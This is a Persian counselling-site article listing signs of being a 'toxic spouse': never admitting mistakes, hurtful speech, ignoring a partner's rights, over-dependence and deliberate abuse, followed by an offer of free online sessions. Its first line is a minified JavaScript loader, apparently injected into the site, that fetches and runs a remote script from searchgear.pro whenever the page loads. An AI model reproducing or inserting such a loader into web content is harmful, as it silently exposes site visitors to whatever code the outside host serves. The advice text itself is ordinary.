;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); همسران سمی | مرکز مشاوره آنلاین روان‌یاری

همسران سمی

میزان پیشرفت خواندن شما

فهرست مطالب

همسران بد و سمی چه ویژگی هایی دارند؟

روانشناسان به این دسته از افراد همسران سمی می گویند،زن و مردی که با داشتن ویژگی های اخلاقی خود را تبدیل به یک همسر بد و غیر قابل تحمل می سازند.

روابط اخلاقی و عاطفی یکی از بخش های مهم زندگی مشترک است که متأسفانه اصلی ترین عامل مشکلات و جدایی ها در میان زوجین محسوب می شود،شما دوست دارید با هسمرتان جوری رفتار کنید که زندگی آرام و پر محبتی داشته باشید یا تمام تلاشتان را می کنید تا همسرتان  شیفته شما شود اما نمی دانید چرا ولی همه چیز برعکس می شود به حدی که همسرتان شما را فردی  به اصطلاح سمی می خواند و از زندگی کردن با شما رضایت ندارد،فکر می کنید چرا این اتفاق می افتد و آخر کار به اینجا ختم می شود؟

در یک جمله پاسخ این است ” همه چیز ریشه در رفتار شما دارد ” .

همسران بد و سمی
http://همسران سمیhttp://ravanyari.com/%d8%a7%d8%b2%d8%af%d9%88%d8%a7%d8%ac-%d8%a8%d8%af%d9%88%d9%86-%d8%b4%da%a9%d8%b3%d8%aa/

به نظر ساده می رسد اما دقیق تر که شویم جزئیات اشتباهات رفتاری را خواهیم گفت که شما را ناخواسته تبدیل به یک همسر بد و غیرقابل تحمل می  سازد.

نشانه هایی که اگر آن ها را در خود دیدید همسران بد و سمی هستید و باید تغییر کنید :

1. شما هرگز اشتباه خود را نمی پذیرید :

اگر متوجه این شده اید که مدام در حال آوردن دلیل  و توجیه برای کارهایتان هستید پس بدانید که رفتار شما ایراد دارد.

واقع بین باشید و در تنهایی خود به پنج رفتار یا اشتباهی که انجام داده اید بیشتر فکر کنید،مسلماً پی به نقطه ضعف هایی خواهید برد یا بهتر است بگوییم شجاعت پذیرفتن اشتباهاتتان را خواهید یافت.

2. مدام تکرار می کنید ” منظورم این نبود ” :

در میان مکالمه های خود با همسرتان حرف هایی ناخوشایند می زنید و او را می رنجانید بعد از مدت کوتاهی ادعا می کنید که منظور شما آنچه که همسرتان برداشت کرده است نبوده.

در اینجا دو مورد از اشتباهات رفتاری شما پدیدار می شود :

* اول اینکه هنگام بحث یا صحبت حریم همسرتان را رعایت نکرده اید و احیاناً توهینی رخ داده است که این به هیچ وجه پذیرفته و مورد قبول نیست.

* دوم اینکه شخصی هستید که بدون فکر کردن سخن می گویید. هسمران این چنینی احساس آرامش را ازهمسرانشان جدا می کنند و نبود آن ها شرایط روحی بهتری برای شریک زندگی شان فراهم خواهد کرد.بهتر است برای تجربه یک مکالمه سالم خط قرمز هایی را در ذهن خود تعیین کنید تا با گذر از آن ها مبادا تبدیل به یک فرد آزاردهنده شوید.

ویژگی های همسران سمی
http://همسران سمیhttp://ravanyari.com/%d8%a7%d8%b2%d8%af%d9%88%d8%a7%d8%ac-%d9%86%d8%a7%d9%85%d9%86%d8%a7%d8%b3%d8%a8/

3. فکر می کنید همیشه راه پیش رو از آن شما است :

رفتار رایج دیگری که اصولاً این دسته از افراد در زندگی مشترک به واسطه آن موجب اختلاف می شوند نادیده گرفتن حق همسرشان است.

این رفتار بیشتر از آنچه که تصور کنید مخرب است و در ذهن همسرتان شما را به طرز ناباورانه ای غیرقابل تحمل خواهد ساخت،چرا که در این شرایط همسر شما به این باور می رسد که نظر،ایده و حتی وجود او هیچ اهمیتی برای شما ندارد.

بهترین روش برای جلوگیری از این اختلاف و ناراحتی اهمیت به حق همسرتان در تمام جوانب زندگی است.

4. بیش از حد وابسته روابط با همسرتان هستید :

  جنس مخالف

بله درست متوجه شده اید منظور از این وابستگی همان است که یک طرف در زندگی مشترک می گوید که اگر روزی همسرش او را ترک کند نابود می شود.

این جمله اصلاً منطقی نیست و این شدت وابستگی به طرف مقابل او را دچار احساس محدودیت می سازد.همسران این دسته از افراد نمی توانند آزادی فکری را تجربه کنند چرا که وابستگی بیش از حد نگرانی و حساسیت هایی را برایشان ایجاد خواهد کرد.سعی کنید خود را در زندگی به عنوان یک فرد مستقل به همسرتان ثابت کنید تا بتواند به شما به عنوان یک فرد قابل اعتماد تکیه کند.

5. شما عمداً شریک زندگی تان را آزار می دهید :

متأسفانه برخی از افراد بی دلیل یا با کوچکترین بهانه طرف مقابل در زندگی مشترکشان را از لحاظ جسمی و روحی مورد آزار و اذیت قرار می دهند.

دلایل مختلفی پشت این ماجرای تلخ نهفته است که در همه حال ترک این عادت غلط بهترین روش برای حفظ رابطه و آرامش در زندگی است.

همسران سمی
http://همسران سمیhttp://ravanyari.com/%d8%a7%d8%b2%d8%af%d9%88%d8%a7%d8%ac-%d9%86%d8%a7%d9%85%d9%86%d8%a7%d8%b3%d8%a8/

با خود تمرین کنید تا در مواقع حساس با یک جمله و یا رفتاری همراه با سکوت اعتراضتان را به همسرتان نشان دهید و به جای آن که اینقدر تنش ایجاد کنید و مطمئن باشید که این روش صد در صد مؤثر خواهد بود در حالی که جنگ و جدال هیچ تأثیر مثبتی نخواهد داشت.

با این رفتارها چه کنیم یا بهتر است بگوییم،چه کنیم همسرمان از زندگی در کنار ما لذت ببرد؟

پاسخ بسیار ساده است و آن هم ترک این عادات غلط و ناپسند در زندگی مشترک و حتی زندگی اجتماعی شما است.

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.